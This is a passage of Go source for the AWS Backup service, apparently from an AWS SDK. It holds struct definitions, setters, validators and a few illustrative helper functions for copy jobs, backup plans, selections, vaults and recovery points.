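func exampleCopyAction() *CopyAction {
	lc := (&Lifecycle{}).
		SetMoveToColdStorageAfterDays(30).
		SetDeleteAfterDays(120) // at least 90 days after the cold transition
	return (&CopyAction{}).
		SetDestinationBackupVaultArn("arn:aws:backup:us-east-1:123456789012:vault:aBackupVault").
		SetLifecycle(lc)
}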
// Contains detailed information about a copy job.
type CopyJob struct {
_ struct{} `type:"structure"`
// The account ID that owns the copy job.
AccountId *string `type:"string"`
// The size, in bytes, of a copy job.
BackupSizeInBytes *int64 `type:"long"`
// The date and time a copy job is completed, in Unix format and Coordinated
// Universal Time (UTC). The value of CompletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CompletionDate *time.Time `type:"timestamp"`
// Uniquely identifies a copy job.
CopyJobId *string `type:"string"`
// Contains information about the backup plan and rule that AWS Backup used
// to initiate the recovery point backup.
CreatedBy *RecoveryPointCreator `type:"structure"`
// The date and time a copy job is created, in Unix format and Coordinated Universal
// Time (UTC). The value of CreationDate is accurate to milliseconds. For example,
// the value 1516925490.087 represents Friday, January 26, 2018 12:11:30.087
// AM.
CreationDate *time.Time `type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a destination copy
// vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
DestinationBackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a destination recovery point; for example,
// arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
DestinationRecoveryPointArn *string `type:"string"`
// Specifies the IAM role ARN used to copy the target recovery point; for example,
// arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// The AWS resource to be copied; for example, an Amazon Elastic Block Store
// (Amazon EBS) volume or an Amazon Relational Database Service (Amazon RDS)
// database.
ResourceArn *string `type:"string"`
// The type of AWS resource to be copied; for example, an Amazon Elastic Block
// Store (Amazon EBS) volume or an Amazon Relational Database Service (Amazon
// RDS) database.
ResourceType *string `type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a source copy vault;
// for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
SourceBackupVaultArn *string `type:"string"`
// An ARN that uniquely identifies a source recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
SourceRecoveryPointArn *string `type:"string"`
// The current state of a copy job.
State *string `type:"string" enum:"CopyJobState"`
// A detailed message explaining the status of the job to copy a resource.
StatusMessage *string `type:"string"`
}
// String returns the string representation
func (s CopyJob) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CopyJob) GoString() string {
return s.String()
}
// SetAccountId sets the AccountId field's value.
func (s *CopyJob) SetAccountId(v string) *CopyJob {
s.AccountId = &v
return s
}
// SetBackupSizeInBytes sets the BackupSizeInBytes field's value.
func (s *CopyJob) SetBackupSizeInBytes(v int64) *CopyJob {
s.BackupSizeInBytes = &v
return s
}
// SetCompletionDate sets the CompletionDate field's value.
func (s *CopyJob) SetCompletionDate(v time.Time) *CopyJob {
s.CompletionDate = &v
return s
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *CopyJob) SetCopyJobId(v string) *CopyJob {
s.CopyJobId = &v
return s
}
// SetCreatedBy sets the CreatedBy field's value.
func (s *CopyJob) SetCreatedBy(v *RecoveryPointCreator) *CopyJob {
s.CreatedBy = v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CopyJob) SetCreationDate(v time.Time) *CopyJob {
s.CreationDate = &v
return s
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *CopyJob) SetDestinationBackupVaultArn(v string) *CopyJob {
s.DestinationBackupVaultArn = &v
return s
}
// SetDestinationRecoveryPointArn sets the DestinationRecoveryPointArn field's value.
func (s *CopyJob) SetDestinationRecoveryPointArn(v string) *CopyJob {
s.DestinationRecoveryPointArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *CopyJob) SetIamRoleArn(v string) *CopyJob {
s.IamRoleArn = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *CopyJob) SetResourceArn(v string) *CopyJob {
s.ResourceArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *CopyJob) SetResourceType(v string) *CopyJob {
s.ResourceType = &v
return s
}
// SetSourceBackupVaultArn sets the SourceBackupVaultArn field's value.
func (s *CopyJob) SetSourceBackupVaultArn(v string) *CopyJob {
s.SourceBackupVaultArn = &v
return s
}
// SetSourceRecoveryPointArn sets the SourceRecoveryPointArn field's value.
func (s *CopyJob) SetSourceRecoveryPointArn(v string) *CopyJob {
s.SourceRecoveryPointArn = &v
return s
}
// SetState sets the State field's value.
func (s *CopyJob) SetState(v string) *CopyJob {
s.State = &v
return s
}
// SetStatusMessage sets the StatusMessage field's value.
func (s *CopyJob) SetStatusMessage(v string) *CopyJob {
s.StatusMessage = &v
return s
}
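// copyJobStatus is an illustrative sketch, not part of the generated API,
// showing the nil-safe way to read the optional pointer fields of a CopyJob
// returned by the service.
func copyJobStatus(job *CopyJob) string {
	if job == nil || job.State == nil {
		return "unknown"
	}
	status := *job.State
	if job.StatusMessage != nil {
		status += ": " + *job.StatusMessage
	}
	return status
}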
type CreateBackupPlanInput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
//
// BackupPlan is a required field
BackupPlan *PlanInput `type:"structure" required:"true"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair. The specified tags
// are assigned to all backups created with this plan.
BackupPlanTags map[string]*string `type:"map" sensitive:"true"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice. If the request
// includes a CreatorRequestId that matches an existing backup plan, that plan
// is returned. This parameter is optional.
CreatorRequestId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupPlanInput"}
if s.BackupPlan == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlan"))
}
if s.BackupPlan != nil {
if err := s.BackupPlan.Validate(); err != nil {
invalidParams.AddNested("BackupPlan", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *CreateBackupPlanInput) SetBackupPlan(v *PlanInput) *CreateBackupPlanInput {
s.BackupPlan = v
return s
}
// SetBackupPlanTags sets the BackupPlanTags field's value.
func (s *CreateBackupPlanInput) SetBackupPlanTags(v map[string]*string) *CreateBackupPlanInput {
s.BackupPlanTags = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupPlanInput) SetCreatorRequestId(v string) *CreateBackupPlanInput {
s.CreatorRequestId = &v
return s
}
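// exampleCreateBackupPlanValidation is an illustrative sketch, not part of
// the generated API: BackupPlan is a required field, so Validate returns an
// ErrInvalidParams naming it when the field is left nil. The tag value and
// request ID below are hypothetical.
func exampleCreateBackupPlanValidation() error {
	team := "platform"
	in := (&CreateBackupPlanInput{}).
		SetBackupPlanTags(map[string]*string{"Team": &team}).
		SetCreatorRequestId("my-idempotency-token")
	return in.Validate() // reports the missing required BackupPlan
}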
type CreateBackupPlanOutput struct {
_ struct{} `type:"structure"`
// A list of BackupOptions settings for a resource type. This option is only
// available for Windows VSS backup jobs.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time that a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. They cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *CreateBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *CreateBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *CreateBackupPlanOutput) SetBackupPlanArn(v string) *CreateBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupPlanOutput) SetBackupPlanId(v string) *CreateBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupPlanOutput) SetCreationDate(v time.Time) *CreateBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *CreateBackupPlanOutput) SetVersionId(v string) *CreateBackupPlanOutput {
s.VersionId = &v
return s
}
type CreateBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the backup plan to be associated with the selection of
// resources.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Specifies the body of a request to assign a set of resources to a backup
// plan.
//
// BackupSelection is a required field
BackupSelection *Selection `type:"structure" required:"true"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.BackupSelection == nil {
invalidParams.Add(request.NewErrParamRequired("BackupSelection"))
}
if s.BackupSelection != nil {
if err := s.BackupSelection.Validate(); err != nil {
invalidParams.AddNested("BackupSelection", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupSelectionInput) SetBackupPlanId(v string) *CreateBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetBackupSelection sets the BackupSelection field's value.
func (s *CreateBackupSelectionInput) SetBackupSelection(v *Selection) *CreateBackupSelectionInput {
s.BackupSelection = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupSelectionInput) SetCreatorRequestId(v string) *CreateBackupSelectionInput {
s.CreatorRequestId = &v
return s
}
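// exampleSelectionValidation is an illustrative sketch, not part of the
// generated API: an empty BackupPlanId violates the one-character minimum, so
// Validate reports both that violation and the missing required
// BackupSelection in a single ErrInvalidParams.
func exampleSelectionValidation() error {
	empty := ""
	in := &CreateBackupSelectionInput{BackupPlanId: &empty}
	return in.Validate()
}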
type CreateBackupSelectionOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup selection is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
SelectionId *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupSelectionOutput) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *CreateBackupSelectionOutput) SetBackupPlanId(v string) *CreateBackupSelectionOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupSelectionOutput) SetCreationDate(v time.Time) *CreateBackupSelectionOutput {
s.CreationDate = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *CreateBackupSelectionOutput) SetSelectionId(v string) *CreateBackupSelectionOutput {
s.SelectionId = &v
return s
}
type CreateBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// Metadata that you can assign to help organize the resources that you create.
// Each tag is a key-value pair.
BackupVaultTags map[string]*string `type:"map" sensitive:"true"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
}
// String returns the string representation
func (s CreateBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *CreateBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "CreateBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *CreateBackupVaultInput) SetBackupVaultName(v string) *CreateBackupVaultInput {
s.BackupVaultName = &v
return s
}
// SetBackupVaultTags sets the BackupVaultTags field's value.
func (s *CreateBackupVaultInput) SetBackupVaultTags(v map[string]*string) *CreateBackupVaultInput {
s.BackupVaultTags = v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *CreateBackupVaultInput) SetCreatorRequestId(v string) *CreateBackupVaultInput {
s.CreatorRequestId = &v
return s
}
// SetEncryptionKeyArn sets the EncryptionKeyArn field's value.
func (s *CreateBackupVaultInput) SetEncryptionKeyArn(v string) *CreateBackupVaultInput {
s.EncryptionKeyArn = &v
return s
}
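// exampleCreateBackupVaultInput is an illustrative sketch, not part of the
// generated API, populating the fields documented above. The vault name, tag,
// and request ID are hypothetical; the KMS key ARN is the documentation's
// example value.
func exampleCreateBackupVaultInput() *CreateBackupVaultInput {
	owner := "backups-team"
	return (&CreateBackupVaultInput{}).
		SetBackupVaultName("my-backup-vault").
		SetBackupVaultTags(map[string]*string{"Owner": &owner}).
		SetCreatorRequestId("create-vault-request-1").
		SetEncryptionKeyArn("arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab")
}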
type CreateBackupVaultOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a backup vault is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s CreateBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s CreateBackupVaultOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *CreateBackupVaultOutput) SetBackupVaultArn(v string) *CreateBackupVaultOutput {
s.BackupVaultArn = &v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *CreateBackupVaultOutput) SetBackupVaultName(v string) *CreateBackupVaultOutput {
s.BackupVaultName = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *CreateBackupVaultOutput) SetCreationDate(v time.Time) *CreateBackupVaultOutput {
s.CreationDate = &v
return s
}
type DeleteBackupPlanInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupPlanInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupPlanInput) SetBackupPlanId(v string) *DeleteBackupPlanInput {
s.BackupPlanId = &v
return s
}
type DeleteBackupPlanOutput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s DeleteBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupPlanOutput) GoString() string {
return s.String()
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *DeleteBackupPlanOutput) SetBackupPlanArn(v string) *DeleteBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupPlanOutput) SetBackupPlanId(v string) *DeleteBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetDeletionDate sets the DeletionDate field's value.
func (s *DeleteBackupPlanOutput) SetDeletionDate(v time.Time) *DeleteBackupPlanOutput {
s.DeletionDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *DeleteBackupPlanOutput) SetVersionId(v string) *DeleteBackupPlanOutput {
s.VersionId = &v
return s
}
type DeleteBackupSelectionInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
// Uniquely identifies the body of a request to assign a set of resources to
// a backup plan.
//
// SelectionId is a required field
SelectionId *string `location:"uri" locationName:"selectionId" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupSelectionInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupSelectionInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupSelectionInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupSelectionInput"}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.SelectionId == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionId"))
}
if s.SelectionId != nil && len(*s.SelectionId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("SelectionId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *DeleteBackupSelectionInput) SetBackupPlanId(v string) *DeleteBackupSelectionInput {
s.BackupPlanId = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *DeleteBackupSelectionInput) SetSelectionId(v string) *DeleteBackupSelectionInput {
s.SelectionId = &v
return s
}
type DeleteBackupSelectionOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupSelectionOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupSelectionOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultAccessPolicyInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultAccessPolicyInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultAccessPolicyInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultAccessPolicyInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultAccessPolicyInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultAccessPolicyInput) SetBackupVaultName(v string) *DeleteBackupVaultAccessPolicyInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultAccessPolicyOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultAccessPolicyOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultAccessPolicyOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultInput) SetBackupVaultName(v string) *DeleteBackupVaultInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultNotificationsInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the Region where they are created. They consist of lowercase letters, numbers,
// and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteBackupVaultNotificationsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultNotificationsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteBackupVaultNotificationsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteBackupVaultNotificationsInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteBackupVaultNotificationsInput) SetBackupVaultName(v string) *DeleteBackupVaultNotificationsInput {
s.BackupVaultName = &v
return s
}
type DeleteBackupVaultNotificationsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultNotificationsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultNotificationsOutput) GoString() string {
return s.String()
}
type DeleteBackupVaultOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteBackupVaultOutput) GoString() string {
return s.String()
}
type DeleteRecoveryPointInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s DeleteRecoveryPointInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteRecoveryPointInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *DeleteRecoveryPointInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "DeleteRecoveryPointInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *DeleteRecoveryPointInput) SetBackupVaultName(v string) *DeleteRecoveryPointInput {
s.BackupVaultName = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *DeleteRecoveryPointInput) SetRecoveryPointArn(v string) *DeleteRecoveryPointInput {
s.RecoveryPointArn = &v
return s
}
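// exampleDeleteRecoveryPointInput is an illustrative sketch, not part of the
// generated API. The vault name is hypothetical; the recovery point ARN is
// the documentation's example value. Both URI fields must be non-empty for
// Validate to pass.
func exampleDeleteRecoveryPointInput() *DeleteRecoveryPointInput {
	return (&DeleteRecoveryPointInput{}).
		SetBackupVaultName("my-backup-vault").
		SetRecoveryPointArn("arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45")
}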
type DeleteRecoveryPointOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s DeleteRecoveryPointOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DeleteRecoveryPointOutput) GoString() string {
return s.String()
}
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
type DependencyFailureException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s DependencyFailureException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s DependencyFailureException) GoString() string {
return s.String()
}
func newErrorDependencyFailureException(v protocol.ResponseMetadata) error {
return &DependencyFailureException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *DependencyFailureException) Code() string {
return "DependencyFailureException"
}
// Message returns the exception's message.
func (s *DependencyFailureException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *DependencyFailureException) OrigErr() error {
return nil
}
func (s *DependencyFailureException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *DependencyFailureException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for the request.
func (s *DependencyFailureException) RequestID() string {
return s.RespMetadata.RequestID
}
type DescribeBackupJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
//
// BackupJobId is a required field
BackupJobId *string `location:"uri" locationName:"backupJobId" type:"string" required:"true"`
}
// String returns the string representation
